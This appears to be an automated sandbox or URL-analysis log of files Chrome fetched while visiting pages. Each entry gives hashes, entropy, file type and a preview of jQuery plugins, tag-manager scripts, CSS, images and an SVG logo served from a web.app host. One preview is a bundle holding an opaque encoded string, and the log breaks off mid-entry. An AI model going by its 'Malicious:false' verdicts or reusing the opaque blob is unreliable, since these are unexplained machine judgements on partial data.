                                                                                                                                                                                                                                                                                MD5:BEFEABE8094635CF1A9AAE1AC8E992F8
                                                                                                                                                                                                                                                                                SHA1:C9A88BF053B8E7FE895EB16B54CCBFEDA55A0722
                                                                                                                                                                                                                                                                                SHA-256:18411752E2DBC6F97CAEA638A728C492139EB276E604C501DE790AFB18CE25E1
                                                                                                                                                                                                                                                                                SHA-512:B7D70FDB46D73FB8C20170FCC2EC807495D5F5D0F2BB6506E1BF06C03F16ED170D85DF5ED22AB8BEA7BB5DA7B515E0C096077C63B98AEF8CAA3A5CAC95509E87
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://images.squarespace-cdn.com/content/v1/65ddde819292aa47ed2c6d1d/7e485c86-26dc-4157-8f73-a00e5d6ed440/our-story.jpg?format=1500w
                                                                                                                                                                                                                                                                                Preview:.....C..............................................!........."$".$.......C............................................................................"..................................................................................2q........[...k+..M.......|..#......8..uX.5,X..z[.#..{{..>.....z.... ..@.`.( .P... .9..|....M.. h......X.(.M..W.....J.{..'....-.$.$.$.$..h.f..8.#8.c8...$c8...$c8..."L..d.).....".84...9W"r...J.*...$.....D.\....U.&.)g*.NPd...p.7........R..I.&..D.E.&....v.hJ,._H.O.%....R.s...K.R..y...7...Y.#..k..O.....e..s..4...I4.X&"......L....'R.......J...7q...7o....._.........Q....3.....d.....K...(O.....$..!".Q..f..d*..l.g..d.)F..q#...Fq"....,.Ze.`.7.&E.pe..&."n.&."r.RNU.g(2n,...9W".....NP.9A.8H...7.LB0...(.D.T....4(.0.....=Q.0a.1'.O...5....6..z..(...9W.q...=<_..|.g.}..k...Z>}.;.%5.. ..#). ........`.....=....4_...<..g.....!.0..n3..f.....L....W#&}...8....8.{.%..U[.......RV.I.4...U..Y\g...!.!d...%d#8.S.F.A.FQ..+.qFFCqd..9BD.$..r&."n...(....If..%\..
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (657), with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):657
                                                                                                                                                                                                                                                                                Entropy (8bit):4.9001162582550135
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12:Vl0CYeiPIXGMAouXT5gmfljafG493sXD6Gg1ArmvfDydzWIGY1XhKUvfaABom5jw:VaCYdPIXAXNffljafG493sXlg1AifDyS
                                                                                                                                                                                                                                                                                MD5:62BE494BE608AE726446870FCAD2CF54
                                                                                                                                                                                                                                                                                SHA1:EB94F7A71809D965C80752B5CED318110241E48D
                                                                                                                                                                                                                                                                                SHA-256:D8F80572E7C35669682F6D11F729668A401409997AA2ECDEDD7C1896E4C9B4F5
                                                                                                                                                                                                                                                                                SHA-512:1CA8C61C4A1D1735CD60DA51B54CD4F6A930C39E4587718E8B8E21DF53FAC4A014C6D9B0E926934E599E96B7879CD37B790545DF4DEEDF6645538980391C648E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/themes/monstroid2/cherry-framework/modules/cherry-post-formats-api/assets/js/min/cherry-post-formats.min.js?ver=1.1.0
                                                                                                                                                                                                                                                                                Preview:!function(t,i){"use strict";i.utilites.namespace("post_formats"),i.post_formats={init:function(){var t=this;i.status.document_ready?t.render(t):i.variable.$document.on("ready",t.render(t))},render:function(t){t.initalize("slider"),t.initalize("popup")},initalize:function(i){t(window).load(function(){t("*[data-cherry"+i+'="1"]').each(function(){var n=t(this).data(i),e=t(this).data("init");return t(this).data("initalized",!1),t(this).trigger({type:"cherry-post-formats-custom-init",item:t(this),object:i}),!0===t(this).data("initalized")?1:n?t.isFunction(jQuery.fn[n])?(t(this)[n](e),void 0):!1:!1})})}},i.post_formats.init()}(jQuery,window.CherryJsCore);
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):65
                                                                                                                                                                                                                                                                                Entropy (8bit):4.0299097360388085
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:IskNjygbU8e2r+nqh8oO:wj3o2GoO
                                                                                                                                                                                                                                                                                MD5:2489B6BEDA4E86203D22D9C4D2E67094
                                                                                                                                                                                                                                                                                SHA1:590C361A0E91BB56D08DDEC98BF49A02E017D191
                                                                                                                                                                                                                                                                                SHA-256:E7112B70EED95D42B178135728E6153E34F07001827870748DE87CD7DEC3538E
                                                                                                                                                                                                                                                                                SHA-512:2DB08EB201F83DD7C2B7293A1E8375C0FE06B1787E21EC0D2F6EF3BC9D5355CCC06208B79FF2457C0175B30A1643AE3B624684E4E834AFDEEA727D7E61A0FB3C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:<HTML><HEAD> <TITLE>200 OK</TITLE></HEAD><BODY>.OK.</BODY></HTML>
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4103), with no line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):4103
                                                                                                                                                                                                                                                                                Entropy (8bit):5.573234278412048
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:/2XjHtorvlP5rJ02moGkUtS6NYVbxb0wCp9s2ALwZxa:eJoTlPHfmookbjCpi4Zs
                                                                                                                                                                                                                                                                                MD5:16D5D552603D86726AE439FC61299D42
                                                                                                                                                                                                                                                                                SHA1:42E252A7AF04292577789C2DF07D88EF749A2B4C
                                                                                                                                                                                                                                                                                SHA-256:9CA07DF45944B8440AE6241E4A017DB2B6E4600E5F647D3180C96877198C3552
                                                                                                                                                                                                                                                                                SHA-512:F26A316E1D94DE19317113B75E1292AB1410D471E5F68BB24F93485F550B486AE6CB7EF9AF0B09F2A5AD4B3B57217A3A726BDA4265B8E0B22CF1E32296ACB2CD
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:!function(t){var r={};function i(n){var e;return(r[n]||(e=r[n]={i:n,l:!1,exports:{}},t[n].call(e.exports,e,e.exports,i),e.l=!0,e)).exports}i.m=t,i.c=r,i.d=function(n,e,t){i.o(n,e)||Object.defineProperty(n,e,{enumerable:!0,get:t})},i.r=function(n){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(n,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(n,"u",{value:!0})},i.t=function(e,n){if(1&n&&(e=i(e)),8&n)return e;if(4&n&&"object"==typeof e&&e&&e.u)return e;var t=Object.create(null);if(i.r(t),Object.defineProperty(t,"default",{enumerable:!0,value:e}),2&n&&"string"!=typeof e)for(var r in e)i.d(t,r,function(n){return e[n]}.bind(null,r));return t},i.n=function(n){var e=n&&n.u?function(){return n.default}:function(){return n};return i.d(e,"a",e),e},i.o=function(n,e){return Object.prototype.hasOwnProperty.call(n,e)},i.p="",i(i.s=0)}([function(n,e,t){var r,i,t=t(1);try{r="A7JYkbIvWKmS8mWYjXO12SIIsfPdI7twY91Y3LWOV/YbZmN1ZhYv8O+Zs6/IPCfBE99aV9tIC8sWZSCN09vf7gkAAACWey
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:gzip compressed data, truncated
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):27
                                                                                                                                                                                                                                                                                Entropy (8bit):3.169382490786664
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:Ftt4ipq4Wln:XtrxWl
                                                                                                                                                                                                                                                                                MD5:8C843FFB840DECAC646424269B22D78B
                                                                                                                                                                                                                                                                                SHA1:823D50FAA2E9D2D75CAEC02C2595C953F165F956
                                                                                                                                                                                                                                                                                SHA-256:CF5E566DC08016A63E1667A2726699C3ADE378330F8E073CC4632D0D19B9F51E
                                                                                                                                                                                                                                                                                SHA-512:C0C1F5624728CDBC57F55C77F6D59C53584F74731A25B8C2EC7C8CCE72725C7AB7A1E1266A8940F19E6C018D3E4A6FA36602987E7EC3680CFFE501A44289070C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://pixel-config.reddit.com/pixels/a2_fcfvqg5hztts/config
                                                                                                                                                                                                                                                                                Preview:...........................
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):8039
                                                                                                                                                                                                                                                                                Entropy (8bit):4.9319682401839025
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:BveNZjltWdPROpGiOtgFGKfkhmOAssUHfqkXPpbrhM:9eN8BEUhBICc
                                                                                                                                                                                                                                                                                MD5:950254FCF355BCD9EC7231F852422A80
                                                                                                                                                                                                                                                                                SHA1:C08E5150B4505ADD53848B96E6513AB526C60387
                                                                                                                                                                                                                                                                                SHA-256:291A147C07C7CC6863AB346392DA3EC7CED127FF01849BDACC6EF06C317D6634
                                                                                                                                                                                                                                                                                SHA-512:ADFC19406D2DB03D28259E8964084A4F4B3C93C5FA2318284A1C61E668FFF7B3A45973E35AC9DEAB325B94A7CC36ACC6902841AC220DBE834F56BC77DFB8B0D0
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:( function( $ ) {..'use strict';.../*.. * debouncedresize: special jQuery event that happens once after a window resize.. *.. * latest version and complete README available on Github:.. * https://github.com/louisremi/jquery-smartresize.. *.. * Copyright 2012 @louis_remi.. * Licensed under the MIT license... */..var $event = $.event,...$special,...resizeTimeout;..$special = $event.special.debouncedresize = {...setup: function() {....$( this ).on( 'resize', $special.handler );...},...teardown: function() {....$( this ).off( 'resize', $special.handler );...},...handler: function( event, execAsap ) {....// Save the context....var context = this,.....args = arguments,.....dispatch = function() {......// set correct event type......event.type = 'debouncedresize';......$event.dispatch.apply( context, args );.....};....if ( resizeTimeout ) {.....clearTimeout( resizeTimeout );....}....if ( execAsap ) {.....dispatch();....} else {.....resizeTimeout = setTimeout( dispatch, $special.threshold );..
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2861)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):225494
                                                                                                                                                                                                                                                                                Entropy (8bit):5.542544219249532
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:zOIp9SXNKW4BKM9Z0xOKCcuBcO9yyqoiAuxixEUDF2Dej7gdFeT/yZk:6IGKl84dcvOzDF2Dej7gdFeTv
                                                                                                                                                                                                                                                                                MD5:C240109C86C49FD3BB4DA17EB53BD872
                                                                                                                                                                                                                                                                                SHA1:93A991EBD5E560774F7EC89A536BF9E6A42577A6
                                                                                                                                                                                                                                                                                SHA-256:BDB86311C777B85767282F0BA53D9B57303030813EDEDC0FA691EE6250F97050
                                                                                                                                                                                                                                                                                SHA-512:287C201F6E6DE9FF01D97C2A7D725F71282DB36EAF8101C619A74CA741C846157A0A0BE35CD4526984A0FFD8F0365E76EFC8BD5C90B684650691F62600BD68CB
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__jsm","vtp_javascript":["template","(function(){var a=window.location.hostname,a=a.split(\".\").slice(-2);return a=a.join(\".\").toLowerCase()})();"]},{"function":"__e"},{"function":"__c","vtp_value":"jdate.co.il, jdate.fr, jdate.uk, about.jdate.com, jlife.jdate.com, about.jdate.co.il"},{"function":"__c","vtp_value":"GTM-W5JKC56"},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp_fieldsToSet":["list",["map","fieldName","allowLinker","value","true"]],"vtp_useHashAutoLink":false,"vtp_autoLinkDomains":["macro",2],"vtp_decorateFormsAutoLink":false,"vtp_enableLinkId":false,"vtp_enableEcommerce":false,"vtp_trackingId":["macro",3],"vtp_enableUaRlsa":false,"vtp_enableUseInte
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):80
                                                                                                                                                                                                                                                                                Entropy (8bit):4.33221219626569
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:LUfQ2pHWiR8HopHW4OE9HsuXU9WyRHfHyI:x2pHD5YEl5k9zyI
                                                                                                                                                                                                                                                                                MD5:1AE6B27EBA211F4CFCD99B904DA88BB7
                                                                                                                                                                                                                                                                                SHA1:53CA38F083C4A21F2EDA633EC304CB4582EDEDA2
                                                                                                                                                                                                                                                                                SHA-256:961635B4E9661208EC118D285B3AC1DBF9F3CC96CDDC97F30E55CD2C6566448C
                                                                                                                                                                                                                                                                                SHA-512:7DD325AB05B1A419614C2C39224C11E1388F09BCA5EA0F56811E6842B4FB243BCB53AA2BDDE00A94FBC324222B47924152C183337EB390F58C59AC80E89593B6
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:jsonFeed({"country":"US","state":"NY","stateName":"New York","continent":"NA"});
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (301)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):164018
                                                                                                                                                                                                                                                                                Entropy (8bit):4.076323351733197
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:0ysQ/KAPiU4Qk89DaseyI4I695JYSjVBJ2crl6XgdgVDb:B3RI695JYSjVqcrCgGRb
                                                                                                                                                                                                                                                                                MD5:0D5A39AF31BA139CEA74A1F13961F6B5
                                                                                                                                                                                                                                                                                SHA1:352A4072999ADB4FAA1CC9246A0C88CAFFA32241
                                                                                                                                                                                                                                                                                SHA-256:59D20278F795F146652B58E370A324A6369F516C7580414AD1D73A423165570F
                                                                                                                                                                                                                                                                                SHA-512:3EB21D517400779E55961B01E5C9C5188B34F6C8E452F815A9869400068ED0D3291F7773DCCE47383C7AF7B7909314697F001259DB60242CAAC481DA52A3EC0D
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:/**. * Swiper 3.3.1. * Most modern mobile touch slider and framework with hardware accelerated transitions. * . * http://www.idangero.us/swiper/. * . * Copyright 2016, Vladimir Kharlampidi. * The iDangero.us. * http://www.idangero.us/. * . * Licensed under MIT. * . * Released on: February 7, 2016. */.(function () {. 'use strict';. var $;. /*===========================. Swiper. ===========================*/. var Swiper = function (container, params) {. if (!(this instanceof Swiper)) return new Swiper(container, params);.. var defaults = {. direction: 'horizontal',. touchEventsTarget: 'container',. initialSlide: 0,. speed: 300,. // autoplay. autoplay: false,. autoplayDisableOnInteraction: true,. autoplayStopOnLast: false,. // To support iOS's swipe-to-go-back gesture (when being used in-app, with UIWebView).. iOSEdgeSwipeDetection: false,.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (14119), with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):14119
                                                                                                                                                                                                                                                                                Entropy (8bit):4.896426731793705
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:b5F2ePV2e4sTf2eZX2e+QCwDTntmeElsVA2emv6CMLWhCVC2emcfs9ystzX5pE95:bv262hsr2A2FMu2x23Q
                                                                                                                                                                                                                                                                                MD5:E1D1A80B46872F93818A985E88A6E877
                                                                                                                                                                                                                                                                                SHA1:B546CF4C39CCC8BBBDDDBB86CBC8B8D149E4F301
                                                                                                                                                                                                                                                                                SHA-256:4255B3E8937D02E114D491E449B5755A584038C54CF94BD38CF42FD0FE443AB6
                                                                                                                                                                                                                                                                                SHA-512:40014C6801B34947B2DBC5325AF99C264ED86E2223B1976E797D90503605FFAEEB58F2162D9D477EA721EB8E3E9D308035898EFB8472E0535F4D8880FB86FA28
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://assets.squarespace.com/universal/styles-compressed/2356ee25bed07678b7ee-min.en-US.css
                                                                                                                                                                                                                                                                                Preview:.gdpr-cookie-banner{box-sizing:border-box}.gdpr-cookie-banner .button-group{display:flex}.gdpr-cookie-banner p{margin:0}.gdpr-cookie-banner.bar{align-items:center;display:flex;justify-content:space-between}.gdpr-cookie-banner.popup{display:flex;flex-direction:column}.gdpr-cookie-banner.full-styling{font-size:12px;z-index:300000}.gdpr-cookie-banner.full-styling.legacy-dark{background:#000;color:#fff}.gdpr-cookie-banner.full-styling.legacy-dark .sqs-toggle>input{background-color:#0e0e0e}.gdpr-cookie-banner.full-styling.legacy-dark .sqs-toggle--off{background-color:#b7b7b7}.gdpr-cookie-banner.full-styling.legacy-dark .sqs-toggle--on,.gdpr-cookie-banner.full-styling.legacy-dark hr{background-color:#fff}.gdpr-cookie-banner.full-styling.legacy-dark .manage-bar-action{color:#fff}.gdpr-cookie-banner.full-styling.legacy-dark .disclaimer-text a{background-image:linear-gradient(90deg,currentColor 100%,currentColor 0);background-position:0 100%;background-repeat:repeat-x;background-size:1px 1px;wh
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):3637
                                                                                                                                                                                                                                                                                Entropy (8bit):4.256856001474857
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:08kpdgw1HxX5YPEHrpV1X6J1wYzHoTPNfRDzgLCAoaq80XmtQEEyp3Hsfdk7rH2o:epvHaE4rHIL26a6XmtFJMEho5T54
                                                                                                                                                                                                                                                                                MD5:9D77AA1062194B9635EE9A90C75217C2
                                                                                                                                                                                                                                                                                SHA1:4439545F9612FCA1B1505D02C31A8AC067151101
                                                                                                                                                                                                                                                                                SHA-256:1F203BB86EF4749135E797176FD1D39C01FEFE958DFD5EE2F60AAE271A60C1B1
                                                                                                                                                                                                                                                                                SHA-512:E7E9AE7A2A23654A1C230DC11503848B2D3EAC3655C32CC620182BD48AB4DD2A86CB3190A72ADE1D8C240B48DF34F1C4682A6FF658AFF8D498B07DA5DFD61CDE
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://ruletridominium.web.app/9d77aa1062194b9635ee9a90c75217c2.svg
                                                                                                                                                                                                                                                                                Preview:<svg version="1.1" id="Ebene_1" xmlns="http://www.w3.org/2000/svg" x="0" y="0" viewBox="0 0 184 120" xml:space="preserve"><style>.st0{fill:#003472}</style><path id="Christian_1_" class="st0" d="M114.3 39.9h5.2v17h-5.3V43.8h-6.9V50c0 2.1.5 3 2.1 3 .7 0 1.2-.1 1.6-.2l.1 4c-.7.3-1.9.4-3.4.4-1.7 0-3.1-.6-4-1.5-1-1-1.5-2.6-1.5-5v-6.9h-2.3v-3.9h2.3v-3.7l5.1-1.2v4.9h7zM40.4 56.5c-1 .4-2.7.8-4.8.8-5.5 0-9-3.4-9-8.7 0-5 3.4-9 9.7-9 1.4 0 2.9.3 4 .6l-.8 3.9c-.6-.3-1.6-.5-3-.5-2.8 0-4.6 2-4.6 4.8 0 3.1 2.1 4.8 4.6 4.8 1.2 0 2.2-.2 3-.5l.9 3.8zm2.9-24.3h5.3v9.7h.1c.5-.8 1.2-1.3 2.1-1.8.8-.4 1.8-.6 2.8-.6 3.4 0 5.9 2.3 5.9 7.5v9.9h-5.3v-9.4c0-2.2-.8-3.8-2.8-3.8-1.4 0-2.3.9-2.6 1.9-.1.3-.2.8-.2 1.1v10.1h-5.3V32.2zm20.3 13.3c0-2.5-.1-4.2-.2-5.6H68l.2 3.1h.1c.9-2.5 2.9-3.5 4.6-3.5.5 0 .8 0 1.1.1v5c-.4-.1-.8-.2-1.4-.2-1.9 0-3.3 1-3.6 2.7-.1.3-.1.8-.1 1.2v8.6h-5.3V45.5zm18.6-10.3c0 1.5-1.1 2.6-2.9 2.6-1.7 0-2.8-1.2-2.8-2.6 0-1.5 1.1-2.6 2.8-2.6 1.8-.1 2.9 1 2.9 2.6zm-5.4 21.7v-17h5.3v17h-5.3zm9.5-4.6c1
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PNG image data, 225 x 225, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):786
                                                                                                                                                                                                                                                                                Entropy (8bit):7.315632491951197
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:KDaMW3IEnvXGPSt7bH/udDcB6antryQQFK:0lOv2EfQQQo
                                                                                                                                                                                                                                                                                MD5:A250B7C67EC7A5E552C7A6DDE64B01C4
                                                                                                                                                                                                                                                                                SHA1:248B99A7A83B5BCFCB6DF8A8EB2A08722BB4FCF2
                                                                                                                                                                                                                                                                                SHA-256:2623C12E9C49D05E9D10CC35E4D336A0C8AAD48DE4CD49CD04E6475DD3E1ABDF
                                                                                                                                                                                                                                                                                SHA-512:4C6B92A9C399931F9F177446E148B09FC60E9C96056B5E2F2B47026C4010724EB4F718DFA38C710D72E89AE1BC23D63F0C77079FAF7F0D414CAB3B5EEF04564E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRpWCD7hhlwTLkRYDvf1cIDavEE0_lqeHD64g&usqp=CAU
                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR..............m"H...oPLTE...........................................yyy<<<......444...........\\\......ooo%%%ggg;;; GGGFFF,,,...QQQCB.....^IDATx....r.@.FaB.,@` `l..%...Y.*.M.).....O..f.................~.N.....i...[4.......rZ.~..........>...>......x...TP..-...-\...,<g.J.n..dd..9....@..K^.`.....@..}.oY+.b.)7P..P{a..T....Vx.N.....[F.....v.k.w3..........yx7.w..06.].l>..:^Bk..'z6.Fa.hN..|...>z4'....L)....E..$]....I..g.hN(.G.>..}.....Q......0K.>...o..GtHR.%.stH.W.gtH.W...$..mtG.Sa...N..."N...4....:....:..6..i>.]..Sa..a.)<Dg.|.K>..)\Dg.|..^...K...K..-:..S.]aq),y9.),x..Tx.......+,....&.~6.M.l.../.........x23....w.,y...B}..P...(.G.>..Q..B}..P...(.G.>..Q..B}..P...(.G.>..Q..B}..P...(.W..k.u..;................_t...]ZM2....IEND.B`.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1951
                                                                                                                                                                                                                                                                                Entropy (8bit):4.908266240837008
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:fRGYOGYvGYKGY4GYKGYW/jPjf01D+Z98B8ifyH:fRCb2EWK/jUD+3ClfI
                                                                                                                                                                                                                                                                                MD5:0737371CA09CA8E090F32040F12CFCBB
                                                                                                                                                                                                                                                                                SHA1:2DC5DD74F8CFB111428B704E2ED23CDEAB6880E9
                                                                                                                                                                                                                                                                                SHA-256:5B8C18DF4CDCF2A155B6DA13F865E47954CB5986092B0CFF698110C0F3793D1A
                                                                                                                                                                                                                                                                                SHA-512:28B106E205FB92CC07A7CB43D17F9811FF1EAAB5B5ECBA89D6311A876BB955089B427184E7A8CCCC8DEB4FAD2005FEBE769F440FA6A9ECB46F988ADBAA688906
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:.... .. .. .. .. <title>D&rsquo;Aquino's Liquor is under construction</title>.. .. .. <link rel="stylesheet" href="https://fonts.bunny.net/css?family=Roboto:400,900">.. <link rel="stylesheet" href="https://daquinoliquor.com.au/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=3.97" type="text/css">.<link rel="stylesheet" href="https://daquinoliquor.com.au/wp-content/plugins/under-construction-page/themes/css/common.css?v=3.97" type="text/css">.<link rel="stylesheet" href="https://daquinoliquor.com.au/wp-content/plugins/under-construction-page/themes/mad_designer/style.css?v=3.97" type="text/css">.<link rel="stylesheet" href="https://daquinoliquor.com.au/wp-content/plugins/under-construction-page/themes/css/font-awesome.min.css?v=3.97" type="text/css">.<link rel="icon" href="https://daquinoliquor.com.au/wp-content/plugins/under-construction-page/themes/images/favicon.png" />.. .... .. <div id="hero-image">.. <img src="http://daq
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (47103)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):355375
                                                                                                                                                                                                                                                                                Entropy (8bit):5.597771314350803
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:e6SvSDtHBX2PIp9SXN7W4L+PM9C0xvKC2uBcO9yyqo5/Aux9SEgpnDF2Dej7Dm1V:v2PIG7laPyd2vO5gbZDF2Dej70
                                                                                                                                                                                                                                                                                MD5:29123BB4F059593CE3C3623AA257C777
                                                                                                                                                                                                                                                                                SHA1:685306610FD4E601D9CC63E517537E6E88CC022B
                                                                                                                                                                                                                                                                                SHA-256:64A6E037FFF09E51978EAF0395741E188CADABD7334DAAF875F0E280A53DE29A
                                                                                                                                                                                                                                                                                SHA-512:0EB9E0252FB06A11EC4D356991697EB06F99F29BABA8B1B2FD7435CA6F838B5E940A256C06421D0752CEC11A518CC00BA63C19664111DF93F9E2A0B503C8FCAE
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"134",. . "macros":[{"function":"__e"},{"function":"__e"},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"item_price"},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"order_id"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"OnetrustActiveGro
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (19948), with no line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):19948
                                                                                                                                                                                                                                                                                Entropy (8bit):5.261902742187293
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:XriNpnjyMkg8XMtExRN1w29JIOzahXtO2nJ65:GijgSWuanfJ65
                                                                                                                                                                                                                                                                                MD5:EC18AF6D41F6F278B6AED3BDABFFA7BC
                                                                                                                                                                                                                                                                                SHA1:62C9E2CAB76B888829F3C5335E91C320B22329AE
                                                                                                                                                                                                                                                                                SHA-256:8A18D13015336BC184819A5A768447462202EF3105EC511BF42ED8304A7ED94F
